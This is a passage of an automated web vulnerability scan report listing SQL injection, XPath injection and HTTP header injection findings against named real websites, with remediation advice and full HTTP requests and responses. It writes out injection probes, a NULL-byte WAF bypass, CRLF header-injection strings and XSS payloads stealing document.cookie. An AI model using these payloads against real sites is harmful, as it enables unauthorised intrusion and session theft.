26.23. http://www.kasimer-ittig.com/domainserve/puview

26.24. http://www.kasimer-ittig.com/domainserve/viewStats

26.25. http://www.shsl.com/

26.26. http://www.storchbrenner.com/

26.27. http://www.usdirectory.com/istat.aspx

26.28. http://www.vault.com/com.vault.home.portlets/homepage_flash.swf

26.29. http://www.w3.org/TR/html4/DTD/strict.dtd

26.30. http://www.w3.org/TR/html4/strict.dtd

27. Content type is not specified

27.1. http://ads.bluelithium.com/st

27.2. http://cim.meebo.com/cmd/tc

27.3. http://guru.sitescout.com/favicon.ico



1. SQL injection  next
There are 10 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://lt.navegg.com/g.lt [ltcid cookie]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://lt.navegg.com
Path:   /g.lt

Issue detail

The ltcid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ltcid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /g.lt?nvst=12596&nvtt=z&nvup=1&nvgpflid=547362597 HTTP/1.1
Host: lt.navegg.com
Proxy-Connection: keep-alive
Referer: http://rafael.adm.br/?ffb7d%22%3E%3Cscript%3Ealert(1)%3C/script%3E21b58676d82=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ltcid=547362597'

Response 1

HTTP/1.1 500 Internal Server Error
P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
Content-Type: text/html
Content-Length: 369
Date: Wed, 19 Jan 2011 18:01:20 GMT
Server: lighttpd/1.4.19

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

Request 2

GET /g.lt?nvst=12596&nvtt=z&nvup=1&nvgpflid=547362597 HTTP/1.1
Host: lt.navegg.com
Proxy-Connection: keep-alive
Referer: http://rafael.adm.br/?ffb7d%22%3E%3Cscript%3Ealert(1)%3C/script%3E21b58676d82=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ltcid=547362597''

Response 2

HTTP/1.1 200 OK
P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
Set-Cookie: inf= ; path=/; domain=.navegg.com; expires=Wed, 20-Jan-2011 06:01:21 GMT
Content-type: application/javascript
Date: Wed, 19 Jan 2011 18:01:21 GMT
Server: lighttpd/1.4.19
Content-Length: 45

tuple=" ";
ltload();
ltsetid("547362597''");

1.2. http://navegg.boo-box.com/sc.lt [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://navegg.boo-box.com
Path:   /sc.lt

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /sc.lt?id=' HTTP/1.1
Host: navegg.boo-box.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
Content-Type: text/html
Content-Length: 369
Date: Wed, 19 Jan 2011 18:09:52 GMT
Server: lighttpd/1.4.19

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

Request 2

GET /sc.lt?id='' HTTP/1.1
Host: navegg.boo-box.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Connection: close
P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
Set-Cookie: inf=''_0_0_0_0_0_0_0-0-0-0-0; path=/; domain=.boo-box.com; expires=Wed, 19-Jan-2012 12:09:52 GMT
Content-type: application/javascript
Date: Wed, 19 Jan 2011 18:09:52 GMT
Server: lighttpd/1.4.19
Content-Length: 23


var NaveggBoobox=1;

1.3. http://v6test.cdn.att.net/image/special2.jpg [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://v6test.cdn.att.net
Path:   /image/special2.jpg

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /image/special2.jpg HTTP/1.1
Host: v6test.cdn.att.net
Proxy-Connection: keep-alive
Referer: http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9c7a66be0e0/Attorneys
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10%00'
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 16:50:03 GMT
Last-Modified: Wed, 19 Jan 2011 16:50:03 GMT
Server: Sun-ONE-Web-Server/6.1
Content-Length: 5532
Content-Type: text/html
X-Cache: MISS from 12.120.38.41
Age: 35
X-Cache: HIT from 12.120.79.21
Via: 1.1 12.120.38.41:80 (cache/2.6.2.2.16.ATT), 1.1 12.120.79.21:80 (cache/2.6.2.2.16.ATT)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>AT&a
...[SNIP]...
<strong>http://www.yellowpages.com/Washington-DC74302&#037;3Cimg&#037;20src&#037;3da&#037;20onerror&#037;3dalert&#040;document.cookie&#041;&#037;3E9c7a66be0e0/Attorneys</strong>
...[SNIP]...

Request 2

GET /image/special2.jpg HTTP/1.1
Host: v6test.cdn.att.net
Proxy-Connection: keep-alive
Referer: http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9c7a66be0e0/Attorneys
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10%00''
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 16:49:53 GMT
Last-Modified: Wed, 19 Jan 2011 16:49:53 GMT
Server: Sun-ONE-Web-Server/6.1
Content-Length: 5422
Content-Type: text/html
X-Cache: HIT from 12.120.38.42
Age: 45
X-Cache: HIT from 12.120.79.20
Via: 1.1 12.120.38.42:80 (cache/2.6.2.2.16.ATT), 1.1 12.120.79.20:80 (cache/2.6.2.2.16.ATT)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>AT&a
...[SNIP]...

1.4. http://www.ebglaw.com/showoffice.aspx [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ebglaw.com
Path:   /showoffice.aspx

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /showoffice.aspx HTTP/1.1
Host: www.ebglaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response 1 (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:48:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=og0sit55134r4kyfq5mdkl3n; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 25

500 Internal Server Error

Request 2

GET /showoffice.aspx HTTP/1.1
Host: www.ebglaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close

Response 2 (redirected)

HTTP/1.1 404 Not Found
Connection: close
Date: Wed, 19 Jan 2011 15:48:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=cjknstzb1jhxzoedkedo5kji; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 56279

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head pro
...[SNIP]...

1.5. http://www.fulbright.com/index.cfm [FUSEACTION parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The FUSEACTION parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the FUSEACTION parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.cfm?FUSEACTION=home.299'&pf=y HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:48:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                       <!-- " ---></TD></TD></TD></TH></T
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 5: Incorrect syntax near ''.
</font>
...[SNIP]...

1.6. http://www.fulbright.com/index.cfm [article_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The article_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the article_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.cfm?fuseaction=news.detail&article_id=9405'&site_id=286 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:49:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                       <!-- " ---></TD></TD></TD></TH></T
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 12: Incorrect syntax near ''.
</font>
...[SNIP]...

1.7. http://www.fulbright.com/index.cfm [emp_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The emp_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the emp_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.cfm?fuseaction=attorneys.detail&site_id=299&emp_id=377' HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:49:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                       <!-- " ---></TD></TD></TD></TH></T
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 60: Incorrect syntax near ''.
</font>
...[SNIP]...

1.8. http://www.fulbright.com/index.cfm [eventID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The eventID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the eventID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.cfm?fuseaction=seminars.detail&eventID=5575'&site_id=492 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:51:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                       <!-- " ---></TD></TD></TD></TH></T
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 4: Incorrect syntax near ''.
</font>
...[SNIP]...

1.9. http://www.fulbright.com/index.cfm [fuseaction parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The fuseaction parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the fuseaction parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.cfm?fuseaction=home.285' HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:49:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                       <!-- " ---></TD></TD></TD></TH></T
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 5: Incorrect syntax near ''.
</font>
...[SNIP]...

1.10. http://www.fulbright.com/index.cfm [site_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The site_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the site_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.cfm?fuseaction=news.site&site_id=299' HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:49:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                       <!-- " ---></TD></TD></TD></TH></T
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 9: Incorrect syntax near ''.
</font>
...[SNIP]...

2. XPath injection  previous  next
There are 2 instances of this issue:

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.


2.1. http://www.hoganlovells.com/FCWSite/Img [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /FCWSite/Img

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /FCWSite'/Img HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 16:02:52 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8083

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...

2.2. http://www.hoganlovells.com/FCWSite/Img [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /FCWSite/Img

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /FCWSite/Img' HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 16:06:15 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7846

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.
...[SNIP]...

3. HTTP header injection  previous  next
There are 5 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


3.1. http://accuserve.homestead.com/files/a_ripple.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://accuserve.homestead.com
Path:   /files/a_ripple.swf

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload acc91%0d%0af14ecc46de1 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /files/acc91%0d%0af14ecc46de1 HTTP/1.1
Host: accuserve.homestead.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Wed, 19 Jan 2011 15:20:44 GMT
Location: /files/acc91
f14ecc46de1
/


3.2. http://ad.doubleclick.net/pfadx/csmonitor_cim/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
